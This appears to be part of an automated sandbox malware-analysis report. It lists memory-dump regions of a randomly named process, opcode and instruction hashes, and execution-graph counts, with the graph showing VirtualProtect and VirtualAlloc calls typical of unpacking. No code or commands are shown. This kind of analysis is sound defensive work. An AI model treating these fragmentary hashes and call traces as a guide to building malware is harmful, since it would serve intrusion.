                                                                                                                                      • Opcode Fuzzy Hash: 712f4ff231cf1df9e3353ec8876cb348f64bf0921d497ba7a92ba37420fbe0c9
                                                                                                                                      • Instruction Fuzzy Hash: C3E1DB70A0991D8FDFA8DF58C895AA9B7B1FF98300F1141E9D01DE72A5DA35AA81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 83cbd31e13ed2f5820b23edfd41443a1bdacbc916e137d17f2bd833682fb3384
                                                                                                                                      • Instruction ID: 9ef747018c34ae2b5d5ff9ad1f37cff200eaab0e588096d04f8df6f7a7fde080
                                                                                                                                      • Opcode Fuzzy Hash: 83cbd31e13ed2f5820b23edfd41443a1bdacbc916e137d17f2bd833682fb3384
                                                                                                                                      • Instruction Fuzzy Hash: B5C15E70E1965DCFDB68EB98C864ABCB7B1FF19301F55017AD009E32A1DB386941CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 86a2634ec3dbf1454e23d8a924c17d41f2794a0a1ef5218cc1695e039424a9ff
                                                                                                                                      • Instruction ID: d124df2b1c37f9c389e9e9aa3cfbe694b8fa505699ca6f31b3bd2ac89ff7657b
                                                                                                                                      • Opcode Fuzzy Hash: 86a2634ec3dbf1454e23d8a924c17d41f2794a0a1ef5218cc1695e039424a9ff
                                                                                                                                      • Instruction Fuzzy Hash: 94D1C970A0991D8FDFA8DF58C894AA9B7B1FF98301F1141A9D01DE72A5DA35AA81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ae113c861d4a671442e8b5641bd154ef4ca2612a7dd5517628363d0991f90800
                                                                                                                                      • Instruction ID: 22419547660759bbe433860cdf8173a789fd2b94bd57b3406d341a6ece332963
                                                                                                                                      • Opcode Fuzzy Hash: ae113c861d4a671442e8b5641bd154ef4ca2612a7dd5517628363d0991f90800
                                                                                                                                      • Instruction Fuzzy Hash: 1EC1DB70E0991D8FDFA8DF58C895AA9B7B1FF98301F1141A9D00DE72A5DA35AE81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1aa1a8c7ac11decc1bbf8afaaa35014846d66d2317917ec153cdc162e36e43f8
                                                                                                                                      • Instruction ID: 615a9b38052f005ffd7c29a6b748a9890ba235b13362755324c61ec293264abd
                                                                                                                                      • Opcode Fuzzy Hash: 1aa1a8c7ac11decc1bbf8afaaa35014846d66d2317917ec153cdc162e36e43f8
                                                                                                                                      • Instruction Fuzzy Hash: 57317C70A0964E8FDF54DF58C8A4AED7BB1FF48344F06026AE859E3291CB34A941CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B886000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B886000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b886000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b5fd85f89e0a5f92e0a7c305ecd6daf52fac2ab16e9809a7e377e8f73aa78f49
                                                                                                                                      • Instruction ID: d04b489ba9ca48700b699481b6c5e3b8adade4defd19427cf82a41642578f8b4
                                                                                                                                      • Opcode Fuzzy Hash: b5fd85f89e0a5f92e0a7c305ecd6daf52fac2ab16e9809a7e377e8f73aa78f49
                                                                                                                                      • Instruction Fuzzy Hash: 06319BB1A0991C8FDFA8DF14C855AE9B3B1FB68305F1041EE810EE32A5CB759A81CF45
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b880000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b1f622d7e59b755dd9ab78132e7f8a065e225ac74a20960239c115fcab38dabf
                                                                                                                                      • Instruction ID: 925516a7c88a49b48abef2cbc6c15947ffe620ffd41dd622ff9d2f4e4215a845
                                                                                                                                      • Opcode Fuzzy Hash: b1f622d7e59b755dd9ab78132e7f8a065e225ac74a20960239c115fcab38dabf
                                                                                                                                      • Instruction Fuzzy Hash: EC310871E1DA8E8FE7229BA8C8212BD7BB1EF49310F060577D465DB1E2CA382609C751
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1d37351a09484cfd75117b9a1b59f7367c0e2378c6ead1a33aa3c455c6adf63e
                                                                                                                                      • Instruction ID: a41b5f7eb359129346f9df0357e569375c61f8cc0c0d94b2c0beea93d1abd82d
                                                                                                                                      • Opcode Fuzzy Hash: 1d37351a09484cfd75117b9a1b59f7367c0e2378c6ead1a33aa3c455c6adf63e
                                                                                                                                      • Instruction Fuzzy Hash: DC315C31A0F64E8FEB21DBA4C9642ED7BB1FF19300F1105B6E409E61E2DA786E18C755
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 305dfd4ecfefeb8955909b34684bc1474d4bd13c012df2d66afcb79e2c13d822
                                                                                                                                      • Instruction ID: 87b3640d0eb154842936b6571defd6b63e5e68ef3b84a7edec6e99976d692abf
                                                                                                                                      • Opcode Fuzzy Hash: 305dfd4ecfefeb8955909b34684bc1474d4bd13c012df2d66afcb79e2c13d822
                                                                                                                                      • Instruction Fuzzy Hash: DC219F31A1965D8FDF19DF58C8616EDB7B1FB59310F01023AD40AD3291DB78A915CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B886000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B886000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b886000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d444e8d6ac81e0fab7bce31c99bcdf4ff1553e20445b1b4158ad4efd1c0a98bc
                                                                                                                                      • Instruction ID: 56f8cc8c88a342abc88996c65922bf3588a34b89148783783fbe75b9eb0b88f8
                                                                                                                                      • Opcode Fuzzy Hash: d444e8d6ac81e0fab7bce31c99bcdf4ff1553e20445b1b4158ad4efd1c0a98bc
                                                                                                                                      • Instruction Fuzzy Hash: 9B31B270E15A2E8FEBB5EB54C858BB8B2F5AF58711F4140F9901DA22A5DE795BC0CF00
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 324f2d527dd0b7f18f9e5644cfd7639261bb033597ece5a4e3318b2cad7074bc
                                                                                                                                      • Instruction ID: dbf7347a426401c9ed45e3dfb7656ba906df34712e4d3a6167629d200864b5fb
                                                                                                                                      • Opcode Fuzzy Hash: 324f2d527dd0b7f18f9e5644cfd7639261bb033597ece5a4e3318b2cad7074bc
                                                                                                                                      • Instruction Fuzzy Hash: 8521D670A0A50D8FEB68EF94D464BBCB7B1EF5C301F1540AEC01AE76A1CA756A918F04
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b880000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0e4cb51344d0706c2ea5a89117e2fe09538f1bebe36d77bf7c481a95099bddb0
                                                                                                                                      • Instruction ID: 759309d2e06940471acacc2a30483c055598292ffd00a683570a718ddecf01c4
                                                                                                                                      • Opcode Fuzzy Hash: 0e4cb51344d0706c2ea5a89117e2fe09538f1bebe36d77bf7c481a95099bddb0
                                                                                                                                      • Instruction Fuzzy Hash: 3A210930A1491E8FDB95EFA8C8949ADB7F1FF5C301B110579D019D72A5DF34A940CB40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B886000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B886000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b886000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0eed96b8525e44838fa94a8d12b10764637ce1a4f8cc8d7b21ec54882696646f
                                                                                                                                      • Instruction ID: 4cf3af5b588c8a442b5d1b14a9f4ea50ed4730b38f7b77a8e7f77ca71cd57a76
                                                                                                                                      • Opcode Fuzzy Hash: 0eed96b8525e44838fa94a8d12b10764637ce1a4f8cc8d7b21ec54882696646f
                                                                                                                                      • Instruction Fuzzy Hash: E021F770E1AA2E8BEBB5DB44C8587B8B2B4AF08710F5100F9901DA22A5DE785B859F44
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B886000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B886000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b886000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3a78fa0e7956fe68c79b18fe9bc3ba5f3450692846fa960cc22e49bf1ad942c3
                                                                                                                                      • Instruction ID: 31c1b156c719dda4b815592b4d5bae18cd24671fdbb7f9a543161bfbbb9cc49d
                                                                                                                                      • Opcode Fuzzy Hash: 3a78fa0e7956fe68c79b18fe9bc3ba5f3450692846fa960cc22e49bf1ad942c3
                                                                                                                                      • Instruction Fuzzy Hash: 9B21D670919A2E8BEBA9EB54C8687E8B2B5EB18700F4140F9D01DA26A5DE741BC4CF00
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b880000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7ffd7c902f817cf67017b6804ad2802b83ef1ad89423cd7b70ef3dfa94365f6d
                                                                                                                                      • Instruction ID: 5bcad2d36417e4acf57804fd8a51fc78058f32ef981fe4410ba3c1b97169cc86
                                                                                                                                      • Opcode Fuzzy Hash: 7ffd7c902f817cf67017b6804ad2802b83ef1ad89423cd7b70ef3dfa94365f6d
                                                                                                                                      • Instruction Fuzzy Hash: 04213870A09A1E8FEB60EB18C9986E8B3B1EF58711F0001E9D05DD22A5DE741B818F40

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 60bae05c0302a89914e7ee31527e6c0289d33a050aff16ef0ae9b28cf77e37d9
                                                                                                                                      • Instruction ID: 67814f8608110dbd8af8a14e58ad2d40f419479488908825857ada116beaab6e
                                                                                                                                      • Opcode Fuzzy Hash: 60bae05c0302a89914e7ee31527e6c0289d33a050aff16ef0ae9b28cf77e37d9
                                                                                                                                      • Instruction Fuzzy Hash: CFF068B090464E9FEB55FF6884596F977E0FF28301F5005B7E81CC25A1DA346190CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 24e715e62a13d92274e501c17007d8ef2a6f7254b2d8ca4818237574fde6fbe4
                                                                                                                                      • Instruction ID: 024fe9052e7497a436231e6f6d3c1961b2c317edd63609164fa037ddf95308d8
                                                                                                                                      • Opcode Fuzzy Hash: 24e715e62a13d92274e501c17007d8ef2a6f7254b2d8ca4818237574fde6fbe4
                                                                                                                                      • Instruction Fuzzy Hash: DCF0CDB190E7C94FE7669B644C791A43FA0FF56300F0A05EBE45CC71E3D9199954C742
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 68bdaf57649ca22d51fe4242983e082807ee769a617484e3abba64688ad8c2dc
                                                                                                                                      • Instruction ID: 97dd3f907e22862dc1ec1384590def3c0e1e7a5c2525b5200195e096127bc343
                                                                                                                                      • Opcode Fuzzy Hash: 68bdaf57649ca22d51fe4242983e082807ee769a617484e3abba64688ad8c2dc
                                                                                                                                      • Instruction Fuzzy Hash: BEF06D7090968E8FCF92DF58C895A993BA0FF69340F0502AAE41CC71A2D774E964CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8B7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B7000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8b7000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3c0659d1a750655651227273a03fca603b56d1d7da04e492bf268b4a22c87430
                                                                                                                                      • Instruction ID: c181dff1414412c58870333471d4a10c9ee915101c2f5a4f66a7d5cd1be1f47c
                                                                                                                                      • Opcode Fuzzy Hash: 3c0659d1a750655651227273a03fca603b56d1d7da04e492bf268b4a22c87430
                                                                                                                                      • Instruction Fuzzy Hash: D0F03C3091978D9FDB559F7488685A97FF0FF09204F4544EBD808C61A2D6385554CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8b0000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: caa6d35307d06b2c1fa0d38ecfbe9f4d854c3040b0d389d49aa820faf0bc63eb
                                                                                                                                      • Instruction ID: 327074ae39ff5c3e932352623ea41117dcdd2ccab5956ff2ecde4c4049c9bf0b
                                                                                                                                      • Opcode Fuzzy Hash: caa6d35307d06b2c1fa0d38ecfbe9f4d854c3040b0d389d49aa820faf0bc63eb
                                                                                                                                      • Instruction Fuzzy Hash: CA018C7091D78D8FDB56DF2488A9AA97FF0FF19304F4500EBE808C62A6D6389594CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: c4b8fa51ff37e57f3634dc13f53e28e0d5192efeb5e579da1f2d2b0ee220b634
                                                                                                                                      • Instruction ID: f0cd4c5949e007dfb337b2a0df2b9340da400600cc0c9508ea392d2325d53a42
                                                                                                                                      • Opcode Fuzzy Hash: c4b8fa51ff37e57f3634dc13f53e28e0d5192efeb5e579da1f2d2b0ee220b634
                                                                                                                                      • Instruction Fuzzy Hash: 25F06D3050A68DCFCF95DF18C865A9A3FE0FF29340F0501A6E418C75A6D734E9A4CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d4a519ccbe55d7512d59d07d1c5206337f08c335b0fa52484f93a5d34e9adfef
                                                                                                                                      • Instruction ID: dbb5e94b4afeafcadb94eff081683a56e029ed68a3bbbf9b277fee56d2bd1c39
                                                                                                                                      • Opcode Fuzzy Hash: d4a519ccbe55d7512d59d07d1c5206337f08c335b0fa52484f93a5d34e9adfef
                                                                                                                                      • Instruction Fuzzy Hash: 57F0F67190A68D8FEB11BBA048692F87BB0FF15300F4548F7E41CC21E3ED281144C742
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 27a8cc295494a35e392f1980b471b2fa826766d0975f86cfae6add84fdaeaed9
                                                                                                                                      • Instruction ID: 190146ce7154272e2c86fb45b111149441a130f87f4e29fcc6cb44908a22fcd7
                                                                                                                                      • Opcode Fuzzy Hash: 27a8cc295494a35e392f1980b471b2fa826766d0975f86cfae6add84fdaeaed9
                                                                                                                                      • Instruction Fuzzy Hash: 1401F670A0550CCFEB64EF84C494BA8B7B1FB59315F1541AAC419EB2A1CB75A981CF00
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: a16cec989d92885b35b29c1bb39ef7e243df487bd9cb1cc11058f1cb72ece7fe
                                                                                                                                      • Instruction ID: 3af38cc812678bf5c2d8df3223d8b439c228c85fee6866940ae374cf63b0217f
                                                                                                                                      • Opcode Fuzzy Hash: a16cec989d92885b35b29c1bb39ef7e243df487bd9cb1cc11058f1cb72ece7fe
                                                                                                                                      • Instruction Fuzzy Hash: FDF0BE7092968D8FDB55EF6898A86ED7FF0FF09300F4100AAE818C21A2DA349694C701
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8B7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B7000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8b7000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ba7a33aac57e6146f5394753ba21e76aaae2599dd1161445d612698430a531f6
                                                                                                                                      • Instruction ID: 146f51af0ea56b3cf4e94149412cccdb2974714daba32c4b057c8338e7a27461
                                                                                                                                      • Opcode Fuzzy Hash: ba7a33aac57e6146f5394753ba21e76aaae2599dd1161445d612698430a531f6
                                                                                                                                      • Instruction Fuzzy Hash: 4BF0547191978C9FDB52AF7488686E97FF0FF15200F4604E7E418C71B2DA349654C711
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7d93440e5048fd3e368c196328a4e992c301f191f9e29bf1829e9d6fff1e251e
                                                                                                                                      • Instruction ID: 37c4e285f216517c9e48b90ec61dd197cfa2dac02dd6b188a8309e5e7aece153
                                                                                                                                      • Opcode Fuzzy Hash: 7d93440e5048fd3e368c196328a4e992c301f191f9e29bf1829e9d6fff1e251e
                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:4.6%
                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:7
                                                                                                                                      Total number of Limit Nodes:0
                                                                                                                                      execution_graph 15933 7ffd9b8903fe 15934 7ffd9b89040d VirtualProtect 15933->15934 15936 7ffd9b89054d 15934->15936 15929 7ffd9b891ae1 15930 7ffd9b891aff 15929->15930 15931 7ffd9b891efd VirtualAlloc 15930->15931 15932 7ffd9b891f55 15931->15932

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 2$H$zM_H
                                                                                                                                      • API String ID: 0-2006335857
                                                                                                                                      • Opcode ID: a5e3893bb9a679acbdde7578f7d4aace76a945a8f72a91a21c66bd10a61e658d
                                                                                                                                      • Instruction ID: eb1ac838aad03b7ee5a8cd2a3492be0c60d6e3356e8c568af0cf6512a2cc616d
                                                                                                                                      • Opcode Fuzzy Hash: a5e3893bb9a679acbdde7578f7d4aace76a945a8f72a91a21c66bd10a61e658d
                                                                                                                                      • Instruction Fuzzy Hash: E8C2D774E1992D8FDBA8DB58C8A4BA9B7B1FF58300F5041E9D01DE72A5DB346A81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
